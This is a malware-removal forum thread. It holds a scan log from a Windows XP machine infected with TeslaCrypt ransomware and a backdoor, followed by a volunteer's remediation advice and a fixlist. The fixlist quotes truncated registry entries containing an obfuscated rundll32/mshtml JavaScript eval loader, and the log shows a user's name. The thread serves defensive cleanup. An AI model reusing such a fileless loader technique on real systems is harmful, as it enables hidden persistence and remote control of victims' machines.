CustomCLSID: HKU\S-1-5-21-484763869-1604221776-1801674531-500_Classes\CLSID\{043AC599-453E-4C44-82B0-6793DE8983C0}\InprocServer32 -> C:\Documents and Settings\All Users\Application Data\{8CCDBBA6-E8EE-4844-9F07-469DCB5F2C87}\secproc. (the data entry has 11 more characters).
CustomCLSID: HKU\S-1-5-21-484763869-1604221776-1801674531-500_Classes\CLSID\{3faa4380-a399-11cf-a466-00805fe418f6}\InprocServer32 -> C:\Program Files\Autodesk\DWG TrueView 2013\en-US\dwgviewrficn.dll (Autodesk, Inc.)
CustomCLSID: HKU\S-1-5-21-484763869-1604221776-1801674531-500_Classes\CLSID\{6A221957-2D85-42A7-8E19-BE33950D1DEB}\localserver32 -> C:\Program Files\Autodesk\DWG TrueView 2013\dwgviewr.exe (Autodesk, Inc.)
CustomCLSID: HKU\S-1-5-21-484763869-1604221776-1801674531-500_Classes\CLSID\{73E709EA-5D93-4B2E-BBB0-99B7938DA9E4}\localserver32 -> C:\WINDOWS\system32\wbem\wmiprvse.exe (Microsoft Corporation)

==================== Restore Points =========================

01-03-2015 13:16:00 System Checkpoint
01-03-2015 13:36:03 Software Distribution Service 3.0
01-03-2015 14:41:56 Installed AVG 2015
01-03-2015 14:43:01 Installed AVG 2015
01-03-2015 19:01:31 Software Distribution Service 3.0
02-03-2015 15:26:26 Removed Call of Duty® 4 - Modern Warfare™
03-03-2015 15:48:27 System Checkpoint
03-03-2015 19:00:16 Software Distribution Service 3.0
04-03-2015 19:00:22 Software Distribution Service 3.0
05-03-2015 19:00:17 Software Distribution Service 3.0
07-03-2015 17:41:25 Software Distribution Service 3.0
07-03-2015 19:00:19 Software Distribution Service 3.0
08-03-2015 18:00:20 Software Distribution Service 3.0
09-03-2015 18:38:35 Software Distribution Service 3.0
09-03-2015 20:53:24 Software Distribution Service 3.0
10-03-2015 18:00:58 Software Distribution Service 3.0
10-03-2015 19:18:17 Software Distribution Service 3.0

==================== Hosts content: ==========================

(If needed Hosts: directive could be included in the fixlist to reset Hosts.)

2009-10-01 12:34 - 2014-03-10 23:02 - 00000855 ____A C:\WINDOWS\system32\Drivers\etc\hosts
127.0.0.1 localhost

==================== Scheduled Tasks (whitelisted) =============

(If an entry is included in the fixlist, the task (.job) file will be moved. The file which is running by the task will not be moved.)

Task: C:\WINDOWS\Tasks\Adobe Flash Player Updater.job => C:\WINDOWS\system32\Macromed\Flash\FlashPlayerUpdateService.exe
Task: C:\WINDOWS\Tasks\GoogleUpdateTaskMachineCore.job => C:\Program Files\Google\Update\GoogleUpdate.exe
Task: C:\WINDOWS\Tasks\GoogleUpdateTaskMachineUA.job => C:\Program Files\Google\Update\GoogleUpdate.exe
Task: C:\WINDOWS\Tasks\Microsoft Windows XP End of Service Notification Logon.job => C:\WINDOWS\system32\xp_eos.exe
Task: C:\WINDOWS\Tasks\Microsoft Windows XP End of Service Notification Monthly.job => C:\WINDOWS\system32\xp_eos.exe
Task: C:\WINDOWS\Tasks\MsgUpdateCheck (de5e9f60-5adf-404f-9048-3ab8bfd91685).job => C:\SmartDraw CI\MarkedUp\tray\TrayNotifierNET35.exe
Task: C:\WINDOWS\Tasks\PC Performer Scheduled Scan.job => C:\Program Files\PC Performer\PCPerformer.exe <==== ATTENTION
Task: C:\WINDOWS\Tasks\SDMsgUpdate (Local).job => C:\SMARTD~1\Messages\SDNotify.exe`-PLocal -V21020405 -SSDNI.ini -A -Mhttp:/www.smartdraw.com/msgs/messagecheck.asp
Task: C:\WINDOWS\Tasks\SDMsgUpdate (TE).job => C:\SMARTD~1\Messages\SDNotify.exe\-PTE -V21020405 -SSDU.ini -A -Mhttp:/www.smartdraw.com/msgs/messagecheck.asp

==================== Loaded Modules (whitelisted) ==============

2009-09-06 12:10 - 2009-12-28 16:17 - 00066872 _____ () C:\WINDOWS\system32\PnkBstrA.exe
2008-09-22 15:41 - 2008-09-22 15:41 - 00564496 _____ () C:\Program Files\Common Files\LogiShrd\LComMgr\Communications_Helper.exe
2015-02-02 17:14 - 2014-10-20 08:36 - 00936656 _____ () C:\Documents and Settings\Administrator\Local Settings\Application Data\Viber\Viber.exe
2015-03-10 19:09 - 2015-03-10 19:09 - 49471488 _____ () C:\Documents and Settings\Administrator\Local Settings\Application Data\Viber\5.0.1.42\libViber.dll
2015-03-10 19:09 - 2015-03-10 19:09 - 00770048 _____ () C:\Documents and Settings\Administrator\Local Settings\Application Data\Viber\5.0.1.42\libGLESv2.dll
2015-03-10 19:09 - 2015-03-10 19:09 - 00106496 _____ () C:\Documents and Settings\Administrator\Local Settings\Application Data\Viber\5.0.1.42\qfacebook.dll
2015-03-10 19:09 - 2015-03-10 19:09 - 00172032 _____ () C:\Documents and Settings\Administrator\Local Settings\Application Data\Viber\5.0.1.42\exif.dll
2015-03-10 19:09 - 2015-03-10 19:09 - 00049152 _____ () C:\Documents and Settings\Administrator\Local Settings\Application Data\Viber\5.0.1.42\libEGL.dll
2008-04-14 06:42 - 2008-04-14 06:42 - 00014336 _____ () C:\WINDOWS\system32\msdmo.dll
2015-03-10 19:09 - 2015-03-10 19:09 - 00876544 _____ () C:\Documents and Settings\Administrator\Local Settings\Application Data\Viber\5.0.1.42\platforms\qwindows.dll
2015-03-10 19:09 - 2015-03-10 19:09 - 00024576 _____ () C:\Documents and Settings\Administrator\Local Settings\Application Data\Viber\5.0.1.42\imageformats\qgif.dll
2015-03-10 19:09 - 2015-03-10 19:09 - 00024576 _____ () C:\Documents and Settings\Administrator\Local Settings\Application Data\Viber\5.0.1.42\imageformats\qico.dll
2015-03-10 19:09 - 2015-03-10 19:09 - 00204800 _____ () C:\Documents and Settings\Administrator\Local Settings\Application Data\Viber\5.0.1.42\imageformats\qjpeg.dll
2015-03-10 19:09 - 2015-03-10 19:09 - 00221184 _____ () C:\Documents and Settings\Administrator\Local Settings\Application Data\Viber\5.0.1.42\imageformats\qmng.dll
2015-03-10 19:09 - 2015-03-10 19:09 - 00016384 _____ () C:\Documents and Settings\Administrator\Local Settings\Application Data\Viber\5.0.1.42\imageformats\qsvg.dll
2015-03-10 19:09 - 2015-03-10 19:09 - 00016384 _____ () C:\Documents and Settings\Administrator\Local Settings\Application Data\Viber\5.0.1.42\imageformats\qtga.dll
2015-03-10 19:09 - 2015-03-10 19:09 - 00311296 _____ () C:\Documents and Settings\Administrator\Local Settings\Application Data\Viber\5.0.1.42\imageformats\qtiff.dll
2015-03-10 19:09 - 2015-03-10 19:09 - 00016384 _____ () C:\Documents and Settings\Administrator\Local Settings\Application Data\Viber\5.0.1.42\imageformats\qwbmp.dll
2015-03-10 19:09 - 2015-03-10 19:09 - 00638976 _____ () C:\Documents and Settings\Administrator\Local Settings\Application Data\Viber\5.0.1.42\sqldrivers\qsqlite.dll
2015-03-10 19:09 - 2015-03-10 19:09 - 00032768 _____ () C:\Documents and Settings\Administrator\Local Settings\Application Data\Viber\5.0.1.42\iconengines\qsvgicon.dll

==================== Alternate Data Streams (whitelisted) =========

(If an entry is included in the fixlist, only the Alternate Data Streams will be removed.)


==================== Safe Mode (whitelisted) ===================

(If an item is included in the fixlist, it will be removed from the registry. The "AlternateShell" will be restored.)

HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\CleanHlp => ""="Driver"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\CleanHlp.sys => ""="Driver"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\SCT_SKMScan => ""="Service"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\CleanHlp => ""="Driver"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\CleanHlp.sys => ""="Driver"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\SCT_SKMScan => ""="Service"

==================== EXE Association (whitelisted) ===============

(If an entry is included in the fixlist, the default will be restored. None default entries will be removed.)


==================== Other Areas ============================

(Currently there is no automatic fix for this section.)

HKU\S-1-5-21-484763869-1604221776-1801674531-1004\Control Panel\Desktop\\Wallpaper ->
HKU\S-1-5-21-484763869-1604221776-1801674531-500\Control Panel\Desktop\\Wallpaper ->
DNS Servers: Media is not connected to internet.

==================== MSCONFIG/TASK MANAGER disabled items ==

(Currently there is no automatic fix for this section.)


==================== Accounts: =============================

Administrator (S-1-5-21-484763869-1604221776-1801674531-500 - Administrator - Enabled) => %SystemDrive%\Documents and Settings\Administrator
ASPNET (S-1-5-21-484763869-1604221776-1801674531-1003 - Limited - Enabled)
Guest (S-1-5-21-484763869-1604221776-1801674531-501 - Limited - Enabled)
HelpAssistant (S-1-5-21-484763869-1604221776-1801674531-1000 - Limited - Disabled)
michelle coe (S-1-5-21-484763869-1604221776-1801674531-1004 - Administrator - Enabled) => %SystemDrive%\Documents and Settings\michelle coe
SUPPORT_388945a0 (S-1-5-21-484763869-1604221776-1801674531-1002 - Limited - Disabled)

==================== Faulty Device Manager Devices =============


==================== Event log errors: =========================

Application errors:
==================
Error: (03/10/2015 07:18:33 PM) (Source: Microsoft Security Client Setup) (EventID: 100) (User: )
Description: HRESULT:0x80070643
Description:. 0x80070643. Fatal error during installation.

Error: (03/10/2015 07:18:33 PM) (Source: MsiInstaller) (EventID: 10005) (User: NT AUTHORITY)
Description: Product: Microsoft Security Client -- All customizable parameters must be specified on install: AMPRODUCT, PRODUCTICON, PRODUCTLOCALIZEDNAME, REMEDIATIONEXE, SIGNATURECATEGORYID and PRODUCT_SKU(NULL)(NULL)(NULL)(NULL)

Error: (03/10/2015 06:03:42 PM) (Source: Microsoft Security Client Setup) (EventID: 100) (User: )
Description: HRESULT:0x80070643
Description:. 0x80070643. Fatal error during installation.

Error: (03/10/2015 06:03:41 PM) (Source: MsiInstaller) (EventID: 10005) (User: NT AUTHORITY)
Description: Product: Microsoft Security Client -- All customizable parameters must be specified on install: AMPRODUCT, PRODUCTICON, PRODUCTLOCALIZEDNAME, REMEDIATIONEXE, SIGNATURECATEGORYID and PRODUCT_SKU(NULL)(NULL)(NULL)(NULL)

Error: (03/09/2015 08:53:34 PM) (Source: Microsoft Security Client Setup) (EventID: 100) (User: )
Description: HRESULT:0x80070643
Description:. 0x80070643. Fatal error during installation.

Error: (03/09/2015 08:53:34 PM) (Source: MsiInstaller) (EventID: 10005) (User: NICK)
Description: Product: Microsoft Security Client -- All customizable parameters must be specified on install: AMPRODUCT, PRODUCTICON, PRODUCTLOCALIZEDNAME, REMEDIATIONEXE, SIGNATURECATEGORYID and PRODUCT_SKU(NULL)(NULL)(NULL)(NULL)

Error: (03/09/2015 06:38:45 PM) (Source: Microsoft Security Client Setup) (EventID: 100) (User: )
Description: HRESULT:0x80070643
Description:. 0x80070643. Fatal error during installation.

Error: (03/09/2015 06:38:44 PM) (Source: MsiInstaller) (EventID: 10005) (User: NT AUTHORITY)
Description: Product: Microsoft Security Client -- All customizable parameters must be specified on install: AMPRODUCT, PRODUCTICON, PRODUCTLOCALIZEDNAME, REMEDIATIONEXE, SIGNATURECATEGORYID and PRODUCT_SKU(NULL)(NULL)(NULL)(NULL)

Error: (03/08/2015 06:00:34 PM) (Source: Microsoft Security Client Setup) (EventID: 100) (User: )
Description: HRESULT:0x80070643
Description:. 0x80070643. Fatal error during installation.

Error: (03/08/2015 06:00:33 PM) (Source: MsiInstaller) (EventID: 10005) (User: NT AUTHORITY)
Description: Product: Microsoft Security Client -- All customizable parameters must be specified on install: AMPRODUCT, PRODUCTICON, PRODUCTLOCALIZEDNAME, REMEDIATIONEXE, SIGNATURECATEGORYID and PRODUCT_SKU(NULL)(NULL)(NULL)(NULL)


System errors:
=============
Error: (03/14/2015 00:51:26 PM) (Source: DCOM) (EventID: 10010) (User: NT AUTHORITY)
Description: The server {73E709EA-5D93-4B2E-BBB0-99B7938DA9E4} did not register with DCOM within the required timeout.

Error: (03/14/2015 00:50:55 PM) (Source: DCOM) (EventID: 10010) (User: NT AUTHORITY)
Description: The server {73E709EA-5D93-4B2E-BBB0-99B7938DA9E4} did not register with DCOM within the required timeout.

Error: (03/14/2015 00:50:24 PM) (Source: DCOM) (EventID: 10010) (User: NT AUTHORITY)
Description: The server {73E709EA-5D93-4B2E-BBB0-99B7938DA9E4} did not register with DCOM within the required timeout.

Error: (03/14/2015 00:49:12 PM) (Source: DCOM) (EventID: 10010) (User: NT AUTHORITY)
Description: The server {73E709EA-5D93-4B2E-BBB0-99B7938DA9E4} did not register with DCOM within the required timeout.

Error: (03/14/2015 00:48:41 PM) (Source: DCOM) (EventID: 10010) (User: NT AUTHORITY)
Description: The server {73E709EA-5D93-4B2E-BBB0-99B7938DA9E4} did not register with DCOM within the required timeout.

Error: (03/14/2015 00:48:10 PM) (Source: DCOM) (EventID: 10010) (User: NT AUTHORITY)
Description: The server {73E709EA-5D93-4B2E-BBB0-99B7938DA9E4} did not register with DCOM within the required timeout.

Error: (03/14/2015 00:47:10 PM) (Source: Service Control Manager) (EventID: 7000) (User: )
Description: The X10 Device Network Service service failed to start due to the following error:
%%1069

Error: (03/14/2015 00:47:10 PM) (Source: Service Control Manager) (EventID: 7038) (User: )
Description: The x10nets service was unable to log on as .\Administrator with the currently configured
password due to the following error:
%%1326

To ensure that the service is
configured properly, use the Services snap-in in Microsoft Management
Console (MMC).

Error: (03/14/2015 00:47:10 PM) (Source: Service Control Manager) (EventID: 7023) (User: )
Description: The Microsoft Antimalware Service service terminated with the following error:
%%2147942402

Error: (03/10/2015 07:18:35 PM) (Source: Windows Update Agent) (EventID: 20) (User: )
Description: Installation Failure: Windows failed to install the following update with error 0x80070643: Update for Microsoft Security Essentials - 4.4.304.0 (KB2902885).


Microsoft Office Sessions:
=========================
Error: (01/14/2015 07:12:37 PM) (Source: Microsoft Office 12 Sessions) (EventID: 7001) (User: )
Description: ID: 6, Application Name: Microsoft Office Outlook, Application Version: 12.0.6691.5000, Microsoft Office Version: 12.0.6612.1000. This session lasted 5190 seconds with 2640 seconds of active time. This session ended with a crash.

Error: (01/16/2014 07:48:18 PM) (Source: Microsoft Office 12 Sessions) (EventID: 7001) (User: )
Description: ID: 6, Application Name: Microsoft Office Outlook, Application Version: 12.0.6680.5000, Microsoft Office Version: 12.0.6612.1000. This session lasted 533193 seconds with 540 seconds of active time. This session ended with a crash.

Error: (05/19/2013 06:27:44 PM) (Source: Microsoft Office 12 Sessions) (EventID: 7001) (User: )
Description: ID: 6, Application Name: Microsoft Office Outlook, Application Version: 12.0.6668.5000, Microsoft Office Version: 12.0.6612.1000. This session lasted 688796 seconds with 840 seconds of active time. This session ended with a crash.

Error: (09/18/2011 00:41:20 PM) (Source: Microsoft Office 12 Sessions) (EventID: 7001) (User: )
Description: ID: 6, Application Name: Microsoft Office Outlook, Application Version: 12.0.6562.5003, Microsoft Office Version: 12.0.6425.1000. This session lasted 3493 seconds with 300 seconds of active time. This session ended with a crash.

Error: (06/17/2011 06:34:17 PM) (Source: Microsoft Office 12 Sessions) (EventID: 7001) (User: )
Description: ID: 6, Application Name: Microsoft Office Outlook, Application Version: 12.0.6557.5001, Microsoft Office Version: 12.0.6425.1000. This session lasted 6949 seconds with 360 seconds of active time. This session ended with a crash.

Error: (01/06/2011 03:46:31 PM) (Source: Microsoft Office 12 Sessions) (EventID: 7001) (User: )
Description: ID: 6, Application Name: Microsoft Office Outlook, Application Version: 12.0.6548.5000, Microsoft Office Version: 12.0.6425.1000. This session lasted 27 seconds with 0 seconds of active time. This session ended with a crash.

Error: (10/07/2010 04:12:49 AM) (Source: Microsoft Office 12 Sessions) (EventID: 7001) (User: )
Description: ID: 6, Application Name: Microsoft Office Outlook, Application Version: 12.0.6539.5000, Microsoft Office Version: 12.0.6425.1000. This session lasted 1243 seconds with 0 seconds of active time. This session ended with a crash.

Error: (05/11/2010 03:22:29 PM) (Source: Microsoft Office 12 Sessions) (EventID: 7001) (User: )
Description: ID: 6, Application Name: Microsoft Office Outlook, Application Version: 12.0.6514.5000, Microsoft Office Version: 12.0.6425.1000. This session lasted 114 seconds with 60 seconds of active time. This session ended with a crash.

Error: (05/07/2010 01:17:41 PM) (Source: Microsoft Office 12 Sessions) (EventID: 7001) (User: )
Description: ID: 13, Application Name: Microsoft Office OneNote, Application Version: 12.0.6500.5000, Microsoft Office Version: 12.0.6425.1000. This session lasted 4 seconds with 0 seconds of active time. This session ended with a crash.

Error: (02/11/2010 05:03:46 PM) (Source: Microsoft Office 12 Sessions) (EventID: 7001) (User: )
Description: ID: 6, Application Name: Microsoft Office Outlook, Application Version: 12.0.6514.5000, Microsoft Office Version: 12.0.6425.1000. This session lasted 616 seconds with 480 seconds of active time. This session ended with a crash.


==================== Memory info ===========================

Processor: Intel® Core™2 Duo CPU E8200 @ 2.66GHz
Percentage of memory in use: 38%
Total physical RAM: 2046.42 MB
Available physical RAM: 1249.58 MB
Total Pagefile: 3938.73 MB
Available Pagefile: 3285.3 MB
Total Virtual: 2047.88 MB
Available Virtual: 1916.87 MB

==================== Drives ================================

Drive c: () (Fixed) (Total:149 GB) (Free:93.25 GB) NTFS ==>[Drive with boot components (Windows XP)]
Drive e: (OLD HardDrive) (Fixed) (Total:74.52 GB) (Free:16.5 GB) NTFS ==>[Drive with boot components (Windows XP)]
Drive f: () (Removable) (Total:7.25 GB) (Free:7.25 GB) FAT32

==================== MBR & Partition Table ==================

========================================================
Disk: 0 (MBR Code: Windows XP) (Size: 149 GB) (Disk ID: D0D4D0D4)
Partition 1: (Active) - (Size=149 GB) - (Type=07 NTFS)

========================================================
Disk: 1 (MBR Code: Windows XP) (Size: 74.5 GB) (Disk ID: 6EDF6EDF)
Partition 1: (Active) - (Size=74.5 GB) - (Type=07 NTFS)

========================================================
Disk: 2 (MBR Code: Windows 7 or 8) (Size: 7.3 GB) (Disk ID: C3072E18)
Partition 1: (Active) - (Size=7.3 GB) - (Type=0B)

==================== End Of Log ============================

Attached Files


Edited by Oh My!, 18 March 2015 - 10:02 AM.
Posted Attach.txt


BC AdBot (Login to Remove)

 


#2 Oh My!

Oh My!

    Adware and Spyware and Malware.....


  • Malware Response Instructor
  • 36,414 posts
  • OFFLINE
  •  
  • Gender:Male
  • Location:California
  • Local time:11:36 PM

Posted 18 March 2015 - 10:12 AM

Greetings sportsfroma2 and :welcome: to BleepingComputer's Virus/Trojan/Spyware/Malware Removal forum.

My name is Oh My! and I am here to help you! Now that we are "friends" please call me Gary.

If you would allow me to call you by your first name I would prefer to do that. :thumbup2:

===================================================

Ground Rules:
  • First, I would like to inform you that most of us here at Bleeping Computer offer our expert assistance out of the goodness of our hearts. Please try to match our commitment to you with your patience toward us. If this was easy we would never have met. :)
  • Please do not run any tools or take any steps other than those I will provide for you while we work on your computer together. I need to be certain about the state of your computer in order to provide appropriate and effective steps for you to take. Most often "well intentioned" (and usually panic driven!) independent efforts can make things much worse for both of us. If at any point you would prefer to take your own steps please let me know, I will not be offended. I would be happy to focus on the many others who are waiting in line for assistance.
  • Please perform all steps in the order they are listed in each set of instructions. Some steps may be a bit complicated. If things are not clear, be sure to stop and let me know. We need to work on this together with confidence.
  • Please copy and paste all logs into your post unless directed otherwise. Please do not re-run any programs I suggest. If you encounter problems simply stop and tell me.
  • When you post your reply, use the Replytopic.jpg button instead.
  • In the upper right hand corner of the topic you will see the Followtopic.jpg button. Click on this then choose Immediate E-Mail notification and then Proceed and you will be sent an email once I have posted a response.
  • If you do not reply to your topic after 5 days we assume it has been abandoned and I will close it.
  • When your computer is clean I will alert you of such. I will also provide for you detailed information about how you can combat future infections.
  • I would like to remind you to make no further changes to your computer unless I direct you to do so.
  • Now let's get started :thumbup2:
===================================================

Now that I am assisting you, you can expect that I will be very responsive to your situation. If you are able, I would request you check this thread at least once per day so that we can try to resolve your issues effectively and efficiently. If you are going to be delayed please be considerate and post that information so that I know you are still with me. Unfortunately, there are many people waiting to be assisted and not enough of us at BleepingComputer to go around. I appreciate your understanding and diligence.

Thank you for your patience thus far. I have some steps for you to take but unfortunately I must first advise you that your files have been encrypted by the TeslaCrypt Ransomware and we will not be able to decrypt your files here. In addition, I would like to inform you of this malware's BackDoor Component.

===================================================

BACKDOOR WARNING!

--------------------

One or more of the identified infections is a Backdoor Trojan.

This allows hackers to remotely control your computer, steal critical system information and download and execute files.

I would counsel you to disconnect this PC from the Internet immediately. If you do any banking or other financial transactions on the PC or if it should contain any other sensitive information, please get to a known clean computer and change all passwords where applicable. Please let me know if you have already noticed evidences of financial institution irregularities. Those accounts should be monitored from this point forward.

Though the trojan has been identified and can be killed, because of it's backdoor functionality, your PC is very likely compromised and there is no way to be sure your computer can ever again be trusted. Many experts in the security community believe that once infected with this type of trojan, the best course of action would be a reformat and reinstall of the OS. Please read these for more information:

How Do I Handle Possible Identify Theft, Internet Fraud and CC Fraud?
When Should I Format, How Should I Reinstall
 

Here are some thoughts I have put together for people who ask what they should do in light of the infection. Ultimately each user must decide for themselves what to do and the below are things you might want to consider.

It is necessary for us to at least make you aware of the worse case scenario. This is because of the potential Backdoor Trojans bring with them, but it is not a determination on our part that your situation currently falls within this worse case scenario.

Ultimately it is a personal decision whether to reformat or not. What decision should you make to let you sleep well at night? It is different for different people. I will say whether rightly or wrongly most people decide to clean and not reformat, at least initially.

The only insight I can offer is how I evaluate the issue personally even though I have never had a Backdoor Trojan on my computer. One of the primary purposes for malicious software is to somehow separate you from your money. It seems reasonable to assume that a thief trying to take your money via a Backdoor Trojan will hit you hard, and quickly. Once your computer starts to act up and you become suspicious you have the opportunity to eliminate access to your computer and change the information taken, namely account and password information. The key to this, in my opinion, is whether or not you have noticed any irregularities in your banking or other financial institutions, or things like email and social network accounts (i.e. Facebook). If you have not seen any evidence of that then you may question whether your information has truly been stolen. If it seems it hasn't, and your critical information has been changed, it is reasonable to be more confident you are safe but you must stop short of claiming an absolute guarantee.

If, after careful consideration you decide not to reformat your computer it would be wise to continue monitoring your sensitive data and don't wait to address future symptoms on your computer which seem to be malware related.

The bottom line, the only way to be absolutely sure to be rid of a Backdoor Trojan is to reformat. The decision is yours.

Oh My!


We can still clean this machine but I can't guarantee that it will be 100% secure afterwards. Let me know what you decide to do. If you decide to go through with the cleanup, please proceed with the following steps.

===================================================

Farbar's Recovery Scan Tool - Run Fix in Normal or Safe Mode

--------------------
  • Press the Windows key Windows_Logo_key.gif + r on your keyboard at the same time. Type in notepad and press Enter
  • Please copy and paste the contents of the below code box into the open notepad and save it to your desktop (<<<Important) as fixlist.txt
HKLM Group Policy restriction on software: C:\Program Files\Microsoft Security Client <====== ATTENTION
HKLM Group Policy restriction on software: C:\Program Files\SUPERAntiSpyware <====== ATTENTION
HKLM Group Policy restriction on software: C:\Documents and Settings\All Users\Application Data\Malwarebytes <====== ATTENTION
HKLM Group Policy restriction on software: C:\Documents and Settings\All Users\Application Data\McAfee <====== ATTENTION
HKLM Group Policy restriction on software: C:\Documents and Settings\All Users\Application Data\Microsoft\Microsoft Antimalware <====== ATTENTION
HKLM Group Policy restriction on software: C:\Program Files\Malwarebytes' Anti-Malware <====== ATTENTION
HKLM\...99B7938DA9E4}\LocalServer32: [Default-wmiprvse] rundll32.exe javascript:"ijpyf8\..\mshtml,RunHTMLApplication ";eval(")odv!@buhwdYNckdbu)#VRbshqu/Rid (the data entry has 362 more characters). <==== ATTENTION!
HKLM\...99B7938DA9E4}\LocalServer32: [a] rundll32.exe javascript:"ijpyf8\..\mshtml,RunHTMLApplication ";eval(")odv!@buhwdYNckdbu)#VRbshqu/Rid (the data entry has 28512 more characters). <==== ATTENTION!
HKLM\SOFTWARE\Policies\Microsoft\Internet Explorer: Policy restriction <======= ATTENTION
HKU\.DEFAULT\SOFTWARE\Policies\Microsoft\Internet Explorer: Policy restriction <======= ATTENTION
HKU\S-1-5-21-484763869-1604221776-1801674531-500\SOFTWARE\Policies\Microsoft\Internet Explorer: Policy restriction <======= ATTENTION
BHO: No Name -> {761497BB-D6F0-462C-B6EB-D4DAF1D92D43} ->  No File
BHO: No Name -> {DBC80044-A445-435b-BC74-9C25C1C588A9} ->  No File
S3 catchme; \??\C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\catchme.sys [X]
S1 exgjfwiw; \??\C:\WINDOWS\system32\drivers\exgjfwiw.sys [X]
S3 rt2870; system32\DRIVERS\rt2870.sys [X]
S1 SABKUTIL; \??\C:\Program Files\SUPERAntiSpyware\SABKUTIL.sys [X]
U3 TrueSight; \??\C:\WINDOWS\system32\TrueSight.sys [X]
2015-02-24 22:20 - 2015-02-25 03:34 - 87668868 _____ () C:\Documents and Settings\Administrator\Application Data\log.html
2015-02-24 22:20 - 2015-02-25 03:34 - 00000636 _____ () C:\Documents and Settings\Administrator\Application Data\key.dat
2015-02-20 17:15 - 2015-02-20 17:15 - 00008630 _____ () C:\HELP_DECRYPT.HTML
2015-02-20 17:15 - 2015-02-20 17:15 - 00004258 _____ () C:\HELP_DECRYPT.TXT
2015-02-20 17:15 - 2015-02-20 17:15 - 00000292 _____ () C:\HELP_DECRYPT.URL
2015-02-20 17:02 - 2015-02-20 17:02 - 00008630 _____ () C:\Documents and Settings\NetworkService\Local Settings\HELP_DECRYPT.HTML
2015-02-20 17:02 - 2015-02-20 17:02 - 00008630 _____ () C:\Documents and Settings\NetworkService\Local Settings\Application Data\HELP_DECRYPT.HTML
2015-02-20 17:02 - 2015-02-20 17:02 - 00008630 _____ () C:\Documents and Settings\NetworkService\HELP_DECRYPT.HTML
2015-02-20 17:02 - 2015-02-20 17:02 - 00008630 _____ () C:\Documents and Settings\NetworkService\Application Data\HELP_DECRYPT.HTML
2015-02-20 17:02 - 2015-02-20 17:02 - 00008630 _____ () C:\Documents and Settings\michelle coe\My Documents\HELP_DECRYPT.HTML
2015-02-20 17:02 - 2015-02-20 17:02 - 00008630 _____ () C:\Documents and Settings\michelle coe\HELP_DECRYPT.HTML
2015-02-20 17:02 - 2015-02-20 17:02 - 00008630 _____ () C:\Documents and Settings\HELP_DECRYPT.HTML
2015-02-20 17:02 - 2015-02-20 17:02 - 00004258 _____ () C:\Documents and Settings\NetworkService\Local Settings\HELP_DECRYPT.TXT
2015-02-20 17:02 - 2015-02-20 17:02 - 00004258 _____ () C:\Documents and Settings\NetworkService\Local Settings\Application Data\HELP_DECRYPT.TXT
2015-02-20 17:02 - 2015-02-20 17:02 - 00004258 _____ () C:\Documents and Settings\NetworkService\HELP_DECRYPT.TXT
2015-02-20 17:02 - 2015-02-20 17:02 - 00004258 _____ () C:\Documents and Settings\NetworkService\Application Data\HELP_DECRYPT.TXT
2015-02-20 17:02 - 2015-02-20 17:02 - 00004258 _____ () C:\Documents and Settings\michelle coe\My Documents\HELP_DECRYPT.TXT
2015-02-20 17:02 - 2015-02-20 17:02 - 00004258 _____ () C:\Documents and Settings\michelle coe\HELP_DECRYPT.TXT
2015-02-20 17:02 - 2015-02-20 17:02 - 00004258 _____ () C:\Documents and Settings\HELP_DECRYPT.TXT
2015-02-20 17:02 - 2015-02-20 17:02 - 00000292 _____ () C:\Documents and Settings\NetworkService\Local Settings\HELP_DECRYPT.URL
2015-02-20 17:02 - 2015-02-20 17:02 - 00000292 _____ () C:\Documents and Settings\NetworkService\Local Settings\Application Data\HELP_DECRYPT.URL
2015-02-20 17:02 - 2015-02-20 17:02 - 00000292 _____ () C:\Documents and Settings\NetworkService\HELP_DECRYPT.URL
2015-02-20 17:02 - 2015-02-20 17:02 - 00000292 _____ () C:\Documents and Settings\NetworkService\Application Data\HELP_DECRYPT.URL
2015-02-20 17:02 - 2015-02-20 17:02 - 00000292 _____ () C:\Documents and Settings\michelle coe\My Documents\HELP_DECRYPT.URL
2015-02-20 17:02 - 2015-02-20 17:02 - 00000292 _____ () C:\Documents and Settings\michelle coe\HELP_DECRYPT.URL
2015-02-20 17:02 - 2015-02-20 17:02 - 00000292 _____ () C:\Documents and Settings\HELP_DECRYPT.URL
2015-02-20 16:59 - 2015-02-20 16:59 - 00008630 _____ () C:\Documents and Settings\michelle coe\Local Settings\HELP_DECRYPT.HTML
2015-02-20 16:59 - 2015-02-20 16:59 - 00008630 _____ () C:\Documents and Settings\michelle coe\Local Settings\Application Data\HELP_DECRYPT.HTML
2015-02-20 16:59 - 2015-02-20 16:59 - 00004258 _____ () C:\Documents and Settings\michelle coe\Local Settings\HELP_DECRYPT.TXT
2015-02-20 16:59 - 2015-02-20 16:59 - 00004258 _____ () C:\Documents and Settings\michelle coe\Local Settings\Application Data\HELP_DECRYPT.TXT
2015-02-20 16:59 - 2015-02-20 16:59 - 00000292 _____ () C:\Documents and Settings\michelle coe\Local Settings\HELP_DECRYPT.URL
2015-02-20 16:59 - 2015-02-20 16:59 - 00000292 _____ () C:\Documents and Settings\michelle coe\Local Settings\Application Data\HELP_DECRYPT.URL
2015-02-20 15:46 - 2015-02-20 15:46 - 00008630 _____ () C:\Documents and Settings\michelle coe\Application Data\HELP_DECRYPT.HTML
2015-02-20 15:46 - 2015-02-20 15:46 - 00004258 _____ () C:\Documents and Settings\michelle coe\Application Data\HELP_DECRYPT.TXT
2015-02-20 15:46 - 2015-02-20 15:46 - 00000292 _____ () C:\Documents and Settings\michelle coe\Application Data\HELP_DECRYPT.URL
2015-02-20 15:45 - 2015-02-20 15:45 - 00008630 _____ () C:\Documents and Settings\LocalService\Local Settings\HELP_DECRYPT.HTML
2015-02-20 15:45 - 2015-02-20 15:45 - 00008630 _____ () C:\Documents and Settings\LocalService\Local Settings\Application Data\HELP_DECRYPT.HTML
2015-02-20 15:45 - 2015-02-20 15:45 - 00008630 _____ () C:\Documents and Settings\LocalService\HELP_DECRYPT.HTML
2015-02-20 15:45 - 2015-02-20 15:45 - 00004258 _____ () C:\Documents and Settings\LocalService\Local Settings\HELP_DECRYPT.TXT
